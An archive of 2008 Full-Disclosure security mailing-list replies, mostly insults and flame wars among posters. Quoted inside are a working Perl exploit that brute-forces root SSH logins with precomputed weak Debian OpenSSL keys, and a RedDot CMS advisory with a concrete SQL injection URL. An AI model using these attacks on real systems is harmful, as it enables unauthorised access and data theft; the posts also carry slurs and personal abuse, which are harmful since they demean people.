Re: [Full-disclosure] next generation sniffer
so you combined wireshark and ettercap. nice job. On Wed, Jun 4, 2008 at 11:22 PM, inter inter [EMAIL PROTECTED] wrote: [0x4553-Intercepter] offers the following features: + Sniffing passwords\hashes of the types: ICQ\IRC\AIM\FTP\IMAP\POP3\SMTP\LDAP\BNC\SOCKS\HTTP\WWW\NNTP\CVS\TELNET\MRA\DC++\VNC\MYSQL\ORACLE + Sniffing chat messages of ICQ\AIM\JABBER\YAHOO\MSN\GADU-GADU\IRC\MRA + Promiscuous-mode scanning + ARP scanning + DHCP discovering + Changing MAC address of LAN adapters + Raw mode (with filtering rules) + eXtreme mode + Capturing packets and post-capture (offline) analyzing + Remote traffic capturing via RPCAP daemon + Built-in arp poison module + Reconstruction of SMTP\POP3 messages Works on Windows NT(2K\XP\2k3\Vista). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] An account of the Estonian Internet War
On Tue, May 20, 2008 at 9:27 AM, Gadi Evron [EMAIL PROTECTED] wrote: http://www.ciaonet.org/journals/gjia/v9i1/699.pdfIt is not technical, I hope you find it useful. Gadi Evron. Have you ever posted anything technical? Are you capable of doing anything useful? Hope you the best in prepping your latest defcon talk about configuring bind. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Working exploit for Debian generated SSH Keys
why don't you code it yourself instead of being a script kiddie faggot. and
don't use ;-) to look cool when you beg for warez.
On Sun, May 18, 2008 at 10:13 AM, bob harley [EMAIL PROTECTED] wrote:
Anyone have a copy of
rsa.2048.tar.bzip2http://www.deadbeef.de/rsa.2048.tar.bzip2?
The web server isn't playing nicely ;-)
On Thu, May 15, 2008 at 2:35 AM, Markus Müller [EMAIL PROTECTED] wrote:
Hi full-disclosure,
the debian openssl issue leads that there are only 65.536 possible ssh
keys generated, cause the only entropy is the pid of the process
generating the key.
This leads to that the following perl script can be used with the
precalculated ssh keys to brute force the ssh login. It works if such a
keys is installed on a non-patched debian or any other system manual
configured to.
On an unpatched system, which doesn't need to be debian, do the following:
1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2
2. Extract it to a directory
3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
Bits, generated on an upatched debian (this is the key this exploit will
break)
4. Run the perl script and give it the location to where you extracted
the bzip2 mentioned.
#!/usr/bin/perl
my $keysPerConnect = 6;
unless ($ARGV[1]) {
print Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n;
print Example: ./exploiter.pl /root/keys/ 127.0.0.1\n;
print By [EMAIL PROTECTED];
exit 0;
}
chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die(opendir);
while ($_ = readdir(A)) {
chomp;
next unless m,^\d+$,;
push(@a, $_);
if (scalar(@a) $keysPerConnect) {
system(echo .join( , @a).; ssh -l root .join( , map { -i
.$_ } @a). .$ARGV[1]);
@a = ();
}
}
5. Enjoy the shell after some minutes (less than 20 minutes)
Regards,
Markus Mueller
[EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Working exploit for Debian generated SSH Keys
Could you never write perl again please? Perl underground should take a shot
at your stuff but you are not worth it.
On Thu, May 15, 2008 at 1:35 AM, Markus Müller [EMAIL PROTECTED] wrote:
Hi full-disclosure,
the debian openssl issue leads that there are only 65.536 possible ssh
keys generated, cause the only entropy is the pid of the process
generating the key.
This leads to that the following perl script can be used with the
precalculated ssh keys to brute force the ssh login. It works if such a
keys is installed on a non-patched debian or any other system manual
configured to.
On an unpatched system, which doesn't need to be debian, do the following:
1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2
2. Extract it to a directory
3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
Bits, generated on an upatched debian (this is the key this exploit will
break)
4. Run the perl script and give it the location to where you extracted
the bzip2 mentioned.
#!/usr/bin/perl
my $keysPerConnect = 6;
unless ($ARGV[1]) {
print Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n;
print Example: ./exploiter.pl /root/keys/ 127.0.0.1\n;
print By [EMAIL PROTECTED];
exit 0;
}
chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die(opendir);
while ($_ = readdir(A)) {
chomp;
next unless m,^\d+$,;
push(@a, $_);
if (scalar(@a) $keysPerConnect) {
system(echo .join( , @a).; ssh -l root .join( , map { -i
.$_ } @a). .$ARGV[1]);
@a = ();
}
}
5. Enjoy the shell after some minutes (less than 20 minutes)
Regards,
Markus Mueller
[EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SECNAP IS CRAP
why are companies like this allowed to exist? Their employee ( Bob McGuire, Director ) openly admits ( see previously emails with Robert, DonB, and I ) that his company participates in FUD and scare tactics. They have no apparent talent and use 'vulnerability scanners' and 'security tools' and divert our conversation from their POS business to how to help protect against spam. Secnap should be blacklisted and its employees should be ridiculed on sight. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] fear mongering and utter BS from secnap
Where is secreview when you actually need them? After the useless thread about gmail blah blah I decided to check out http://www.secnap.com/ and all I can say is WHAT THE FUCK. The first lines of their website: The Internet comes with built in threats from hackers, industrial Espionage, spyware and employee abuse. Sounds like some homeland security brochure Followed shortly by: Our Managed IPS solution includes our patent pending HackerTrap™ IPS that will block external attacks as well as protect your company from employee abuse and loss of confidential information. I would love to see some proof of them stopping confidential information from being gathered over an internal network, but based on their site I am sure this is more BS anyway. Then I browse to: http://www.secnap.com/services.php?pg=3 Are you aware that there are an estimated 100,000 hackers on the Internet today, actively scanning government and corporate networks, looking for vulnerabilities they can exploit to gain access to critical corporate information? Speaks for itself If you follow the link on this page you find a pdf here: http://www.secnap.com/pdfs/pentest.pdf Where it details how they will run public vulnerability scanners and compare your banners to known vulnerable services. Who are the script kiddies here again? This company is trash and their members should not be allowed to post on this list. They are Homeland Security/George Bush type fear mongering retards trying to make a buck and scare people into their nonsense. Looking at their site they are another group of paid script kiddies in business suits. You better hope that one of 100,000 internet hackers don't have any exploits that aren't covered by nessus or secnap will not be able to protect you anymore. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] fear mongering and utter BS from secnap
so because I use a gmail account it means everything I said is invalid? Why not answer some questions about your practices since it seems your company is a bunch of script kiddies for hire master's of scaring people into buying services Also where did the 100,000 hackers figure come from? Did you make this up also? On Sat, May 10, 2008 at 9:18 PM, Robert McGuire [EMAIL PROTECTED] wrote: I'll take you seriously when you come out from behind your gmail mask. Bob McGuire Director, Channel Sales East | SECNAP Network Security Direct Line 404.446.1961 1-877-NOSPAM4U (877-667-7264) ext.1961 http://www.spammertrap.com/ SpammerTrap – Everything Channel Hot Product of 2008 SECNAP Voted Hot Company of 2008 at Technosium Summit www.technosium.com/hotcompanies/ -Original Message- From: reepex [mailto:[EMAIL PROTECTED] Sent: Sat 5/10/2008 3:13 PM To: Michael Scheidell; full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]; [EMAIL PROTECTED]; Kevin Barnabe; Robert McGuire; Jennifer Hamilton Subject: fear mongering and utter BS from secnap Where is secreview when you actually need them? After the useless thread about gmail blah blah I decided to check out http://www.secnap.com/ and all I can say is WHAT THE FUCK. The first lines of their website: The Internet comes with built in threats from hackers, industrial Espionage, spyware and employee abuse. Sounds like some homeland security brochure Followed shortly by: Our Managed IPS solution includes our patent pending HackerTrapT IPS that will block external attacks as well as protect your company from employee abuse and loss of confidential information. I would love to see some proof of them stopping confidential information from being gathered over an internal network, but based on their site I am sure this is more BS anyway. Then I browse to: http://www.secnap.com/services.php?pg=3 Are you aware that there are an estimated 100,000 hackers on the Internet today, actively scanning government and corporate networks, looking for vulnerabilities they can exploit to gain access to critical corporate information? Speaks for itself If you follow the link on this page you find a pdf here: http://www.secnap.com/pdfs/pentest.pdf Where it details how they will run public vulnerability scanners and compare your banners to known vulnerable services. Who are the script kiddies here again? This company is trash and their members should not be allowed to post on this list. They are Homeland Security/George Bush type fear mongering retards trying to make a buck and scare people into their nonsense. Looking at their site they are another group of paid script kiddies in business suits. You better hope that one of 100,000 internet hackers don't have any exploits that aren't covered by nessus or secnap will not be able to protect you anymore. _ This email has been scanned and certified safe by SpammerTrap(r). For Information please see http://www.spammertrap.com _ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] fear mongering and utter BS from secnap
I scratched my reply to this mail because don's reply was much better On Sat, May 10, 2008 at 10:33 PM, Robert McGuire [EMAIL PROTECTED] wrote: I don't believe remaining anonymous invalidates comments, just seems unnecessary, much like FUD. Can't argue with reepex, FUD is unnecessary and utterly transparent so you have to wonder why every company in the industry perpetuates it. It's counterproductive in fact, makes my job more difficult so were it up to me it wouldn't be a part of our message. If either of you have better insight regarding the impact, cost, effect of spam please share. Bob McGuire Director, Channel Sales East | SECNAP Network Security Direct Line 404.446.1961 1-877-NOSPAM4U (877-667-7264) ext.1961 http://www.spammertrap.com/ SpammerTrap – Everything Channel Hot Product of 2008 SECNAP Voted Hot Company of 2008 at Technosium Summit www.technosium.com/hotcompanies/ -Original Message- From: don bailey [mailto:[EMAIL PROTECTED] Sent: Sat 5/10/2008 10:39 PM To: reepex Cc: Robert McGuire; Michael Scheidell; Kevin Barnabe; Jennifer Hamilton Subject: Re: [Full-disclosure] fear mongering and utter BS from secnap -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 reepex wrote: | so because I use a gmail account it means everything I said is invalid? | Why not answer some questions about your practices since it seems your | company is a bunch of script kiddies for hire master's of scaring | people into buying services | | Also where did the 100,000 hackers figure come from? Did you make this | up also? | | On Sat, May 10, 2008 at 9:18 PM, Robert McGuire [EMAIL PROTECTED] | mailto:[EMAIL PROTECTED] wrote: | | I'll take you seriously when you come out from behind your gmail mask. | | Bob McGuire | Director, Channel Sales East You may not want to take him seriously, but I suggest you take his questions seriously. People in this industry don't particularly appreciate FUD or bullshit facts. And my name really is Don Bailey so you can be assured that I'm not hiding behind any mask. D -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.9 (GNU/Linux) iEYEARECAAYFAkgmXFIACgkQttfe3HwtctNlQQCeNgdVXFuoy3zJbDwf81i07qyc 5JEAniRfy6fCyRPL5c76UCPwlLizk3aU =TC/X -END PGP SIGNATURE- _ This email has been scanned and certified safe by SpammerTrap(r). For Information please see http://www.spammertrap.com _ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] fear mongering and utter BS from secnap
very well said :) I guess bullshit and made up stats are acceptable since everyone else is doing it. On Sat, May 10, 2008 at 10:49 PM, don bailey [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Robert McGuire wrote: | I don't believe remaining anonymous invalidates comments, just seems unnecessary, much like FUD. | | Can't argue with reepex, FUD is unnecessary and utterly transparent so you have to wonder why every company in the industry perpetuates it. It's counterproductive in fact, makes my job more difficult so were it up to me it wouldn't be a part of our message. | | If either of you have better insight regarding the impact, cost, effect of spam please share. | Well now that you're admitting that FUD is part of your business model I'm saddened that this e-mail isn't to a public mailing list. I'm sure many professionals would be interested in your ethics. Blaming other companies in the security industry is child's play and only serves to make you look foolish. I find it extremely laughable that you are attempting to redirect this discussion to the impact, cost, effect of spam. Our focus is your company's blatant use of fake facts to push your product. Do you really think you're talking to adolescents? I'm not distracted by your shiny nickel. Either stay on topic or end the conversation. D -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.9 (GNU/Linux) iEYEARECAAYFAkgmbKsACgkQttfe3HwtctNreACgkS4VrTOS00qxmdnFigrXmnHW lK0AnjYr1Ob52O6nlM2pZJsPOr0H9Dlz =tNH1 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Joey, joey, joey...
and what do you do outside of FD? apply windows updates and push norton AV updates to clients? On Sat, May 10, 2008 at 11:19 AM, Paul Schmehl [EMAIL PROTECTED] wrote: --On May 9, 2008 9:37:12 PM -0700 Professor Micheal Chatner [EMAIL PROTECTED] wrote: You probably don't even have a CISSP. -- Professor Micheal Chatner, M.D., CISSP That's OK. Neither do you. In fact, you don't even exist outside of FD. That's a pretty sick existence. Paul Schmehl ([EMAIL PROTECTED]) Senior Information Security Analyst The University of Texas at Dallas http://www.utdallas.edu/ir/security/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ZF04 has been released!
Once again zf0 shows they cannot hack anyone worthwhile. cDc, robert lemos, and anonymous? Could you have picked any bigger script kiddies? and no one gives a fuck about your pwnie awards. On Fri, May 9, 2008 at 7:11 PM, [EMAIL PROTECTED] wrote: I, Robert Lemos (see robertlemos.com, I need hits!) have collaborated with the ZF0 team to bring you this piece. Check out my blog or milw0rm or http://cypher0.h18.ru//zf04.txt for more information! I am talking to SecurityFocus about making it a featured item, so don't forget to check securityfocus.com and robertlemos.com for further details in the upcoming weeks! Thank you dearies, Bobby Bologna Lemos -- Need cash? Apply now for a credit loan with fast approval. http://tagline.hushmail.com/fc/Ioyw6h4d9Gyiv6nESV9TAQBvCr8C4r1hkqmjBFVGxTf92DBCslgqSE/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] HD Moore
no one cares what a CISSP has to say On Fri, May 2, 2008 at 9:44 PM, John C. A. Bambenek, GCIH, CISSP [EMAIL PROTECTED] wrote: ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft device helps police pluck evidence from cyberscene of crime
you are a retard. its for live memory analysis on a running machine. not anything like a bootable Live Cd. On Tue, Apr 29, 2008 at 8:41 PM, Peter Besenbruch [EMAIL PROTECTED] wrote: On Tuesday 29 April 2008 14:31:18 Ivan . wrote: http://seattletimes.nwsource.com/html/microsoft/2004379751_msftlaw29.html It looks like the Microsoft version of a Knoppix disk. -- Hawaiian Astronomical Society: http://www.hawastsoc.org HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Cirque du 0day HIJACKED!!!
you reply to everyone else but skip my email about your botnet? I guess that means its up and running well? On Fri, Apr 25, 2008 at 6:49 PM, I)ruid [EMAIL PROTECTED] wrote: On Thu, 2008-04-24 at 14:40 -0700, Andrew A wrote: Stop lying to everyone. Caughq.org got owned and rm'd. Looks like Michael Chatner is a more fitting individual to run the Cirque than you, buddy. Rght... that's why when I put a new power supply in it this morning it booted with it's filesystem intact, right? (: -- I)ruid, C²ISSP [EMAIL PROTECTED] http://druid.caughq.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Could n3td3v win a Pwnie award?
at least you wouldn't have to remove trojans and tracking cookies off your customer's machines then On Sat, Apr 26, 2008 at 11:39 PM, Micheal Cottingham [EMAIL PROTECTED] wrote: Indeed. There is no such thing as secure. Security is a process, one that never ends. If it did, many of us would be out of a job. ;) On Sun, Apr 27, 2008 at 12:01 AM, G. D. Fuego [EMAIL PROTECTED] wrote: On Sat, Apr 26, 2008 at 10:32 PM, Joey Mengele [EMAIL PROTECTED] wrote: wishi, On Sat, 26 Apr 2008 12:19:46 -0400 wishi [EMAIL PROTECTED] wrote: I thought exactly the same. Security is a process. If someone doesn't understand, that it's better to know the vulnerabilities to defend, he didn't understand it. I think you have this mixed up. Security a destination, not a process. If that was true then the system you secure today would be safe untouched a year from now or the year after that. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Cirque du 0day HIJACKED!!!
how is the botnet linked with services.caughq.org doing? Still spamming aim clients? On Thu, Apr 24, 2008 at 10:29 AM, I)ruid . [EMAIL PROTECTED] wrote: Wow, that didn't take long... I released a draft of the Cirque du 0day CFP to a few closed channels a week or so ago, to float the idea around and see if anyone was interested in participating. Apparently Michael Chatner decided to hijack the idea and submit it to the public himself. Unfortunately the power supply died in my co-located box for caughq.org last week and so I cannot currently respond from my usual email address, [EMAIL PROTECTED] Anyhow, any number of people can confirm that Michael Chatner's publication of the Cirque du 0day idea is illegitimate, including Jeff Moss whom I emailed about the idea a week and a half ago to get his opinion on whether or not the idea would be supported by the DEFCON organization and staff. You can expect a much more flushed out version of this CFP after my discussions with Jeff and the DEFCON staff are over, assuming the idea is a go. I therefore must recommend that no one respond to Michael's illigitimate CFP for and claim to the Cirque du 0day idea, and rather shame him for being a huge poser. (: ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IRM Security Advisory : RedDot CMS SQL injection vulnerability
so IRMPLC goes from xss in cisco products to sql injection in a small user base webapp? I think you may need to fire your current 'research' team and start over On Mon, Apr 21, 2008 at 11:06 AM, Mark Crowther [EMAIL PROTECTED] wrote: RedDot CMS SQL injection vulnerability (CVE Number: CVE-2008-1613) http://www.irmplc.com/index.php/167-Advisory-026 Vulnerability Type/Importance: SQL injection/Critical Problem Discovered: 12 February 2008 Vendor Contacted: 19 February 2008 Advisory Published: 21 April 2008 Abstract: The RedDot CMS Product (http://www.reddot.com) is vulnerable to a pre-authentication SQL injection vulnerability which, when exploited, allows enumeration of all SQL database content. Description: The 'LngId' Parameter passed to IoRD.asp is responsible for assigning the language context for the CMS application. The vulnerability exists as a result of inadequate validation of user-supplied input within this parameter. Technical Details: Normal input for the 'LngId' parameter contains a code such as ENG, DEU, JP, denoting the language type. This parameter is not properly validated and the injection of SQL statements within it allows attackers unrestricted access to enumerate information from the database. For example: https://vulnerablehost.com:443/cms/ioRD.asp?Action=ShowMessageLngId=ENG.DGC0FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSOBJECTS where xtype=char(85) and name '' ORDER BY 1;-- DisableAutoLogin=1 Proof of Concept: A Proof of Concept (RDdbenum.py) has been developed to automate enumeration of entire database content available from http://www.irmplc.com/Tools/RDdbenum.py Workaround / Solutions: There are no known workarounds for this vulnerability The Vendor has released a patch for this vulnerability, Release 7.5.1.86, available from normal Red Dot customer support contacts. Tested / Affected Versions: IRM confirmed the presence of this vulnerability in RedDot CMS version 7.5 Build 7.5.0.48, tested with Microsoft SQL Server 2005 database. It is believed that this issue exists in RedDot CMS versions 6.5 and 7.0; however this has not been fully verified. Credits: Research and Advisory: Mark Crowther and Rodrigo Marcos Disclaimer: All information in this advisory is provided on an 'as is' basis in the hope that it will be useful. Information Risk Management Plc is not responsible for any risks or occurrences caused by the application of this information. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security issue in Filezilla 3.0.9.2:passwordsare stored in plain text (sitemanager.xml)
Micheal Cottingham [EMAIL PROTECTED] wrote: techie.michael .. enough said, go back to geek squad and stay off the list ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security issue in Filezilla 3.0.9.2: passwords are stored in plain text (sitemanager.xml)
FTP PASSWORDS ARE STORED IN PLAINTEXT?!?!?!?! HOLY FUCK On Fri, Apr 18, 2008 at 2:09 PM, carl hardwick [EMAIL PROTECTED] wrote: A security issue in Filezilla 3.0.9.2 (and previous versions) allows local users to retrieve all saved passwords because they're stored in a plain text sitemanager.xml ?xml version=1.0 encoding=UTF-8 standalone=yes ? FileZilla3 Servers Server Hostftpspace.domain.com/Host Port21/Port Protocol0/Protocol Type0/Type Logontype1/Logontype User[EMAIL PROTECTED]/User PassI'mAPlainTextPassword/Pass ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Secunia Research: Lotus Notes Folio Flat File Parsing Buffer Overflows
I find it funny you are the one to complain about too many advisories when you spam the list with sprintf and strcpy bugs you grepped for in random applications everyday On Tue, Apr 15, 2008 at 9:20 AM, Luigi Auriemma [EMAIL PROTECTED] wrote: Autonomy Keyview Folio Flat File Parsing Buffer Overflows Autonomy Keyview Applix Graphics Parsing Vulnerabilities Autonomy Keyview EML Reader Buffer Overflows activePDF DocConverter Folio Flat File Parsing Buffer Overflows activePDF DocConverter Applix Graphics Parsing Vulnerabilities Lotus Notes Applix Graphics Parsing Vulnerabilities Lotus Notes Folio Flat File Parsing Buffer Overflows Lotus Notes EML Reader Buffer Overflows Lotus Notes kvdocve.dll Path Processing Buffer Overflow Lotus Notes htmsr.dll Buffer Overflows Symantec Mail Security Folio Flat File Parsing Buffer Overflows Symantec Mail Security Applix Graphics Parsing Vulnerabilities 12 mails for the same library? From what I have understood all the bugs are just in this Autonomy Keyview library so in my opinion reporting the same identical bugs in each software which uses this thirdy part component and additionally without saying that the problem in reality is in the library is wrong and leads to a lot of confusion. It's just like if someone finds a bug in zlib and releases 1 advisories, one for each program in the world which uses the library... the bug is not in these 1 programs but only in zlib. --- Luigi Auriemma http://aluigi.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OpenID. The future of authentication on the web?
thats right pdp - go run to your protected lists and blogs where you don't have to hear anything negative and where you can flame people without contest who talk against you. you are another Bill O Reilly and everyone thinks of you as such. enjoy your sheep. On Sun, Mar 23, 2008 at 9:52 AM, Petko D. Petkov [EMAIL PROTECTED] wrote: Hi Steven, I guess most 1337 hax0rs will flame you on this list. There are good security blogs you can follow and learn from instead. Full-disclosure is for rants and bashing only! I can point you to some articles that I wrote regarding OpenID, however, let me share my thoughts quickly as that will save you some time and of course if you are still curious you can go research further. First of all, OpenID is a very simple but rather useful technology. With OpenID you have only one account, your ID, which you can use everywhere where the OpenID technology is supported. It is not clear whether this setup is more secure from what we have at the moment (every site forces you to register unique username/password pair) but it is definitely more convenient. The first argument for OpenID is that the more you share your secrets, credits card information, usernames, password, the higher the chances this information to be leaked or stolen. On the other hand, OpenID is prone to phishing attacks so user education is required. Think about OpenID as the equivalent of PayPal for authentication. In theory, it is more secure to pay through paypal as you are not sharing your credit card information with everyone else but a single provider. I am all for OpenID as you can spend good time on securing a single system. If the OpenID provider is not vulnerable to common Web attacks and it provides good privacy mechanisms such as SSL and the top of which are build good authentication features such as one-time tokens, etc then OpenID is the preferable choice. Keep in mind though, that if your OpenID account is hacked, the attacker will be able to login as you anywhere they want. This is the main concern and disadvantage. pdp P.S. dear list, the only reason I am not priv-massaging Steven is because I believe that there are other people who are interested in this topic. So, instead of wasting valuable resources and energy answering everyone individually, I've decided to do it once hoping that this message will be seen by others. Thanks! On Sun, Mar 23, 2008 at 12:18 PM, Steven Rakick [EMAIL PROTECTED] wrote: Hello list, I'm curious what the group thinks about the recent surge in support for OpenID across the web and the impact it will have. 1) Beemba - http://www.beemba.com 2) ClaimID - http://www.claimid.com 3) MyOpenID - http://www.myopenid.com 4) Many others... These sites are gaining in popularity quickly and with the announcements of support from big players Yahoo, AOL, Microsoft and Google, combined with smaller web2.0 celeb-run sites like Digg, OpenID appears to what will eventually be the norm. Thoughts? I've also noticed that many of these sites are bundling Information Card support (CardSpace on Windows). Sounds like a good idea as it compliments OpenID and helps address some weaknesses. Again, any thoughts? I'm really just interested in a dialog. -sr Never miss a thing. Make Yahoo your home page. http://www.yahoo.com/r/hs ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Petko D. (pdp) Petkov | GNUCITIZEN | Hakiri | Spin Hunters gnucitizen.org | hakiri.org | spinhunters.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] perl underground and tssci security
For those who do not know, perl underground has released the 5th edition of their e-zine and it can be found here: http://milw0rm.com/papers/194 I would like to thank the perl underground editors for taking my suggestion [1] how long did it take you to write all 40 lines of your 'labs' code? I shall notify perl underground of your horrendous perl and you shalll be a source of great lulz in their next production. and publishing the crap code that marcin and his company writes. I believe PU summarized it best when they said: # TS/SCI security is a good example of some jerkoffs who want to put themselves somewhere in the blog # scene but don't have any content to back them up. So they say let's put up four or five really # shitty scripts, in different languages, to show those blog-reading bitches that we've got skillz, # but we're going to be too lame to actually get it right or notice the mistakes, and nobody will read # our shit anyways so it's all good # Good thing we have talented people to poke fun at, otherwise we'd rip apart every fucking piece of # code you penisgrabbers had up there. Well said PU. I also find it funny that these local projects are now gone and the only stuff on the projects page is external links to other people's work. [1] http://readlist.com/lists/lists.netsys.com/full-disclosure/8/40475.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [full disclosure] agile hacking?
On Wed, Mar 19, 2008 at 1:35 PM, [EMAIL PROTECTED] wrote: % ps ax | grep '[x]yzzy' | wc -l you could also teach people the -c parameter to grep but I am just a troll ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] agile hacking?
On Wed, Mar 19, 2008 at 6:08 AM, Petko D. Petkov [EMAIL PROTECTED] wrote: you are the only one backing up troth, read on all comments.. You are very dense. All the people posting bad about thoth have not seen his work either. They are mindless sheep following your bad example. Have you looked at his VMX slides yet? I don't bash people. This made me laugh Comparing the Agile Hacking project with books such as How to Own a Continent (by FX, Paul Craig, Joe Grand, and Tim Mullen...), How to Own the Box (by Ryan Russell, Ido Dubrawsky, FX, and Joe Grand...), How to Own a Shadow (by Johnny Long, Tim Mullen, and Ryan Russell...), The Art of Intrusion (by Kevin D. Mitnick, and William L. Simon..) and the Hacking Exposed series (by some of the most recognized information security experts such as, but not only, Johnny Cache, Chris Davis, Stuart McClure, Joel Scambray, Andrew Vladimirov, Brian Hatch, David Endler...), Listing the authors does not make a book good. Have you read any of the books? Hacking exposed is a collection of lame/outdated/fixed techniques such as Ping of Death. Lets take a look at the table of contents for hacking exposed edition 5. Chapter 1: Footprinting ( lol ) Chapter 2: Scanning ( with no mention of how it works only tools ) Chapter 3: Enumeration Chapter 4: Hacking Windows Chapter 5: Hacking Unix All these chapters do is tell you how to run a bunch of tools looking for the first outdated service so that you can run a public exploit against it. If you want your book to be in the great line of kiddie manuscripts then you are well on your way. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by 